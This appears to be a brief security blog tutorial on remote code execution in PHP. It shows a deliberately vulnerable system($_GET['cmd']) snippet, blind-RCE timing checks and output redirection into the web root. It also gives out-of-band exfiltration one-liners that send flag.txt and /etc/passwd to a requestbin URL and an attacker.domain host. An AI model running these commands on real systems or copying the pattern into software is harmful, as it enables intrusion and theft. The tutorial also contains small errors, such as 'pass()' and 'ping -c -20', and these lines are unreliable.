Pwning PHP: Remote Code Execution
RCE allows an attacker to execute code on a vulnerable machine and the CVSS severity level of RCE is critical (well what more do you need than that?)
Note: Check out this blog for more PHP Pwning and to learn why PHP is targeted.
System:
Similar to the system() function in C, system() in PHP executes all the input as shell commands in the machine. If the user inputs are passed into it, this will lead to Code Execution.
<?php
$cmd = $_GET[‘cmd’];
system($cmd); ?>
PHP documentation warns developers not you use it without an input sanitization function.
Other similar code execution functions:
exec(): Execute an external program
pass(): Returns raw output
When the output is not returned it becomes a blind RCE but, how can we verify the bug? We can verify by using time delays,
ping -c 10 192.168.0.2 delays by 10 secs
ping -c -20 192.168.0.2 delays by 20 secs
Redirecting Output:
If we have to read the output of the command we can redirect it to a file and expose the file to read it,
uname -i > /var/www/html/info.txt
Similarly, symbols like “&”(for appending commands), “|”(for piping out of one command to another command as input).
Out Of Bound RCE:
We can read the output by returning it through different protocols,
curl http://requestbin.net/your-server?output=`cat flag.txt`
nslookup `cat /etc/passwd`.attacker.domain
RCE has a lot more variants than I covered, try to explore them as they are worth spending time on. For example, there are lots of techniques to bypass Web Application Firewalls and other sanitization programs. And there is a crazy method to cover up RCE inside DNS queries, here are some resources to keep your quest going:
https://owasp.org/www-community/attacks/Code_Injection
https://blog.qualys.com/product-tech/2019/10/30/php-remote-code-execution-vulnerability-cve-2019-11043
https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41